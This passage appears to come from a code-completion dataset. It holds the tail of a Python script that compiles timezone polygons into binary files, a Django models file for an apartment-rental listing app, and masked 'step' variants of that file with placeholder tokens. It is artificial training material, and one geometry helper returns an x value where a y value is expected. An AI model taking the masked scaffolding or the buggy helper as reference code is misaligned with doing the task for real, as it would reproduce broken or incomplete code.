floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n\n output_list.append(end)\n return output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n 
\"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return ((y - y1) * (x2 - x1) / delta_y) + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return ((x - x1) * (y2 - y1) / delta_x) + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n # print('Y1<=y')\n if y_coords[iplus1] > y:\n # this was a crossing. compute the intersect\n # print('Y2>y')\n intersects.append(\n compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n else:\n # print('Y1>y')\n if y_coords[iplus1] <= y:\n # this was a crossing. compute the intersect\n # print('Y2<=y')\n intersects.append(compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i],\n y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n # this was a crossing. compute the intersect\n intersects.append(\n compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n else:\n if x_coords[iplus1] <= x:\n # this was a crossing. compute the intersect\n intersects.append(compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i],\n y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n\n # x_longs = binary_reader.x_coords_of(line)\n x_longs, y_longs = ints_of(line)\n\n # y_longs = binary_reader.y_coords_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n\n step = 1 / NR_SHORTCUTS_PER_LAT\n # print('checking the latitudes')\n for lat in latitudes_to_check(ymax, ymin):\n # print(lat)\n # print(coordinate_to_longlong(lat))\n # print(y_longs)\n # print(x_intersections(coordinate_to_longlong(lat), x_longs, y_longs))\n # raise ValueError\n intersects = sorted([int2coord(x) for x in\n x_intersections(coord2int(lat), x_longs, y_longs)])\n # print(intersects)\n\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError('an uneven number of intersections has been accounted')\n\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n # collect all the zones between two intersections [in,out,in,out,...]\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n # the polygon has a point exactly on the border of a shortcut zone here!\n # only select the top shortcut if it is actually inside the polygon (point a little up is inside)\n if contained(coord2int(intersection_in), coord2int(lat) + 1, x_longs,\n y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat) - 1))\n # the bottom shortcut is always selected\n shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat)))\n\n else:\n # add all the shortcuts for the whole found area of intersection\n possible_y_shortcut = y_shortcut(lat)\n\n # both shortcuts should only be selected when the polygon doesnt stays on the border\n middle = intersection_in + (intersection_out - intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1, x_longs,\n y_longs):\n while intersection_in < 
intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n\n possible_longitudes.append(intersection_out)\n\n # the shortcut above and below of the intersection should be selected!\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut_min1))\n else:\n # polygon does not cross the border!\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n\n possible_longitudes.append(intersection_out)\n\n # only the shortcut above of the intersection should be selected!\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))\n\n # print('now all the longitudes to check')\n # same procedure horizontally\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n # print(lng)\n # print(coordinate_to_longlong(lng))\n # print(x_longs)\n # print(x_intersections(coordinate_to_longlong(lng), x_longs, y_longs))\n intersects = sorted([int2coord(y) for y in\n y_intersections(coord2int(lng), x_longs, y_longs)])\n # print(intersects)\n\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError('an uneven number of intersections has been accounted')\n\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n # collect all the zones between two intersections [in,out,in,out,...]\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n # the polygon has a point exactly on the border of a shortcut here!\n # only select the left shortcut if it is actually inside the polygon (point a little left is inside)\n if contained(coord2int(lng) - 1, coord2int(intersection_in), x_longs,\n y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1, y_shortcut(intersection_in)))\n # the right shortcut is always selected\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(intersection_in)))\n\n else:\n # add all the shortcuts for the whole found area of intersection\n possible_x_shortcut = x_shortcut(lng)\n\n # both shortcuts should only be selected when the polygon doesnt stays on the border\n middle = intersection_in + (intersection_out - intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle), x_longs,\n y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n\n possible_latitudes.append(intersection_out)\n\n # both shortcuts right and left of the intersection should be selected!\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))\n shortcuts_for_line.add((possible_x_shortcut_min1, y_shortcut(possible_latitude)))\n\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n # only the shortcut right of the intersection should be selected!\n possible_latitudes.append(intersection_out)\n\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))\n\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, 
xmin, ymax, ymin in all_boundaries:\n # xmax, xmin, ymax, ymin = boundaries_of(line=line)\n if line % 100 == 0:\n print(line)\n # print([xmax, xmin, ymax, ymin])\n\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n\n if big_zone(xmax, xmin, ymax, ymin):\n\n # print('line ' + str(line))\n # print('This is a big zone! computing exact shortcuts')\n # print('Nr of entries before')\n # print(len(column_nrs) * len(row_nrs))\n # print('columns and rows before optimisation:')\n # print(column_nrs)\n # print(row_nrs)\n # print(ints_of(line))\n\n # This is a big zone! compute exact shortcuts with the whole polygon points\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin, ymax, ymin, line)\n # n += len(shortcuts_for_line)\n\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n\n # remove shortcuts from outside the possible/valid area\n for x, y in shortcuts_for_line:\n if x < min_x_shortcut or x > max_x_shortcut or y < min_y_shortcut or y > max_y_shortcut:\n shortcuts_to_remove.append((x, y))\n\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n\n # print('and after:')\n # print(len(shortcuts_for_line))\n # print(shortcuts_for_line)\n # column_nrs_after = set()\n # row_nrs_after = set()\n # for x, y in shortcuts_for_line:\n # column_nrs_after.add(x)\n # row_nrs_after.add(y)\n # print(column_nrs_after)\n # print(row_nrs_after)\n # print(shortcuts_for_line)\n\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!')\n if len(shortcuts_for_line) < 3:\n raise ValueError('algorithm not valid! less than 3 zones detected (should be at least 3)')\n\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n # print(shortcuts_for_line)\n\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n\n line += 1\n # print('collected entries:')\n # print(n)\n\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n\n # there are two floats per coordinate (lng, lat)\n nr_of_floats = 2 * sum(all_lengths)\n\n # write number of entries in shortcut field (x,y)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n # TODO write test\n # the list of polygon ids in each shortcut is sorted after freq. of appearance of their zone id\n # this is critical for ruling out zones faster\n # (as soon as just polygons of one zone are left this zone can be returned)\n # only around 5% of all shortcuts include polygons from more than one zone\n # in most of those cases there are only two types of zones (= entries in counted_zones) and one of them\n # has only one entry (important to check the zone with one entry first!).\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n # also make sure polygons with the same zone freq. 
are ordered after their zone id\n # (polygons from different zones should not get mixed up)\n sort = sorted((sorted(zipped, key=lambda x: x[1])), key=lambda x: x[2])\n return [x[0] for x in sort] # take only the polygon nrs\n\n # count how many shortcut addresses will be written:\n # flatten out the shortcuts in one list in the order they are going to be written inside the polygon file\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[(x, y)]\n shortcut_entries.append(sort_poly_shortcut(shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n # print((x,y,this_lines_shortcuts))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n\n if amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG * NR_SHORTCUTS_PER_LAT:\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n\n print('The number of filled shortcut zones are:', amount_filled_shortcuts, '(=',\n round((amount_filled_shortcuts / amount_of_shortcuts) * 100, 2), '% of all shortcuts)')\n\n # for every shortcut <H and <I is written (nr of entries and address)\n shortcut_space = 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I)\n for nr in nr_of_entries_in_shortcut:\n # every line in every shortcut takes up 2bytes\n shortcut_space += NR_BYTES_H * nr\n\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):', nr_of_floats)\n\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n\n print('Done\\n')\n # write zone_ids\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n\n # write boundary_data\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin), coord2int(ymax), coord2int(ymin)))\n output_file.close()\n\n # write polygon_data, addresses and number of values\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!', all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n output_file.write(pack(b'<I', length))\n output_file.close()\n\n # [SHORTCUT AREA]\n # write all nr of entries\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 
300:\n raise ValueError(\"There are too many polygons in this shortcut:\", nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n\n # write Address of first Polygon_nr in shortcut field (x,y)\n # Attention: 0 is written when no entries are in this shortcut\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n # each line_nr takes up 2 bytes of space\n adr += 2 * nr\n output_file.close()\n\n # write Line_Nrs for every shortcut\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n\n # write corresponding zone id for every shortcut (iff unique)\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!')\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[(x, y)]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n # there is a polygon from a different zone (hence an invalid id should be written)\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n # also write an Invalid Id when there is no polygon at all\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n\n output_file.close()\n # [HOLE AREA, Y = number of holes (very few: around 22)]\n hole_space = 0\n\n # '<H' for every hole store the related line\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n\n # '<H' Y times [H unsigned short: nr of values (coordinate PAIRS! 
x,y in int32 int32) in this hole]\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n\n # '<I' Y times [ I unsigned int: absolute address of the byte where the data of that hole starts]\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n # each pair of points takes up 8 bytes of space\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n\n # Y times [ 2x i signed ints for every hole: x coords, y coords ]\n # write hole polygon_data\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n\n print('the polygon data makes up', percent(polygon_space, total_space), '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space), '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\nif __name__ == '__main__':\n # parsing the data from the .json into RAM\n parse_polygons_from_json(path=INPUT_JSON_FILE_NAME)\n # update all the zone names and set the right ids to be written in the poly_zone_ids.bin\n # sort data according to zone_id\n update_zone_names(path=TIMEZONE_NAMES_FILE)\n\n # IMPORTANT: import the newly compiled timezone_names pickle!\n # the compilation process needs the new version of the timezone names\n with open(abspath(join(__file__, pardir, TIMEZONE_NAMES_FILE)), 'r') as f:\n timezone_names = json.loads(f.read())\n\n # compute shortcuts and write everything into the binaries\n compile_binaries()\n",
"step-ids": [
11,
13,
15,
17,
22
]
}
|
[
11,
13,
15,
17,
22
] |
import datetime
import operator
import geopy
from django.db import models
from django.db.models import Q
from django.db.models.query import QuerySet
from django.db.models import permalink
from django.contrib.auth.models import User
geocoder = geopy.geocoders.Google()
class City(models.Model):
name = models.CharField(max_length=30, unique=True)
class Meta:
ordering = ('name',)
verbose_name_plural = "cities"
def __unicode__(self):
return self.name
class Area(models.Model):
name = models.CharField(max_length=50)
city = models.ForeignKey(City)
class Meta:
unique_together = ('name', 'city')
ordering = ('name',)
def __unicode__(self):
return self.name
class ApartmentQuerySet(QuerySet):
def available(self):
return self.filter(
is_available=True,
tenant__is_active=True,
)
class ApartmentManager(models.Manager):
def get_query_set(self):
return ApartmentQuerySet(self.model).select_related(
'area', 'area__city')
def available(self):
return self.get_query_set().available()
def search(self, search):
if search:
search = search.strip()
if not search:
return self.none()
search_fields = (
'area__name__iexact',
'area__city__name__iexact',
'postcode__iexact',
'address__icontains',
)
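        # Build one Q lookup per field and OR them together, so a hit on any
        # single field (area name, city name, postcode or address) is enough to match.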
criteria = [Q(**{field : search})
for field in search_fields]
return self.filter(reduce(operator.or_, criteria))
class Apartment(models.Model):
TYPE_APARTMENT = 1
TYPE_DETACHED = 2
TYPE_SEMIDETACHED = 3
    TYPE_COTTAGE = 4
TYPE_CHOICES = (
(TYPE_APARTMENT, "Apartment"),
(TYPE_DETACHED, "Detached house"),
(TYPE_SEMIDETACHED, "Semi-detached house"),
(TYPE_COTTAGE, "Cottage"),
)
SAUNA_NONE = 1
SAUNA_SHARED = 2
SAUNA_OWN = 3
SAUNA_CHOICES = (
(SAUNA_NONE, "No sauna"),
(SAUNA_SHARED, "Shared/communal sauna"),
(SAUNA_OWN, "Own sauna"),
)
ROOM_CHOICES = (
(1, "1 room"),
(2, "2 rooms"),
(3, "3 rooms"),
(4, "4 rooms"),
)
LANDLORD_TENANT = 1
LANDLORD_PRIVATE = 2
LANDLORD_AGENCY = 3
LANDLORD_CHOICES = (
(LANDLORD_TENANT, "Occupant"),
(LANDLORD_PRIVATE, "Private landlord"),
(LANDLORD_AGENCY, "Rental agency"),
)
area = models.ForeignKey(Area)
tenant = models.ForeignKey(User)
landlord = models.IntegerField(
choices=LANDLORD_CHOICES,
default=LANDLORD_PRIVATE,
)
agency = models.CharField(max_length=100, null=True, blank=True)
agency_website = models.URLField(null=True, blank=True)
address = models.CharField(max_length=100)
postcode = models.CharField(max_length=7)
latitude = models.FloatField(null=True, blank=True)
longitude = models.FloatField(null=True, blank=True)
added_on = models.DateTimeField(auto_now_add=True)
is_available = models.BooleanField(default=True)
available_from = models.DateField(null=True, blank=True)
available_to = models.DateField(null=True, blank=True)
    is_shared = models.BooleanField('Shared accommodation', default=False)
type = models.IntegerField(
choices=TYPE_CHOICES,
default=TYPE_APARTMENT,
)
num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)
floor = models.IntegerField(null=True, blank=True)
lift = models.BooleanField(default=False)
num_floors = models.IntegerField(null=True, blank=True)
sauna = models.IntegerField(
choices=SAUNA_CHOICES,
default=SAUNA_NONE,
)
rent_pcm = models.DecimalField(
decimal_places=2,
max_digits=8,
)
deposit = models.DecimalField(
decimal_places=2,
max_digits=8,
null=True,
blank=True
)
smoking = models.BooleanField(default=False)
pets = models.BooleanField(default=False)
size = models.FloatField('Size (sqm)')
garden_size = models.FloatField(null=True, blank=True)
furnished = models.BooleanField(default=False)
cable = models.BooleanField(default=False)
broadband = models.BooleanField(default=False)
satellite = models.BooleanField(default=False)
balcony = models.BooleanField(default=False)
parking = models.BooleanField(default=False)
garage = models.BooleanField(default=False)
bike_storage = models.BooleanField(default=False)
extra_storage = models.BooleanField(default=False)
gym = models.BooleanField(default=False)
laundry = models.BooleanField(default=False)
description = models.TextField(null=True, blank=True)
kitchen_amenities = models.TextField(null=True, blank=True)
furniture = models.TextField(null=True, blank=True)
heating = models.TextField(null=True, blank=True)
other_amenities = models.TextField(null=True, blank=True)
objects = ApartmentManager()
def __unicode__(self):
return self.get_full_address()
@permalink
def get_absolute_url(self):
return ('apartments:detail', [str(self.id)])
def get_full_address(self):
return "{0}, {1} {2}".format(
self.address,
self.postcode,
self.area.city.name.upper()
)
def is_agency_landlord(self):
return self.landlord == self.LANDLORD_AGENCY
def get_location(self):
searchable = "{0}, {1} {2}, Finland".format(
self.address,
self.postcode,
self.area.city,
)
address, (lat, lng) = geocoder.geocode(
searchable,
exactly_one=True
)
return lat, lng
def save(self, *args, **kwargs):
self.latitude, self.longitude = self.get_location()
super(Apartment, self).save(*args, **kwargs)
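# Illustrative queries against this model (hypothetical data; assumes a configured
# Django project with this apartments app installed):
#   Apartment.objects.available()          # available flats whose tenant account is active
#   Apartment.objects.search("Helsinki")   # case-insensitive match on area, city, postcode or address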
|
normal
|
{
"blob_id": "89ba805e47a9727573e1e25371a70fb887ee170d",
"index": 9141,
"step-1": "<mask token>\n\n\nclass Area(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n <mask token>\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = 
models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass City(models.Model):\n <mask token>\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = 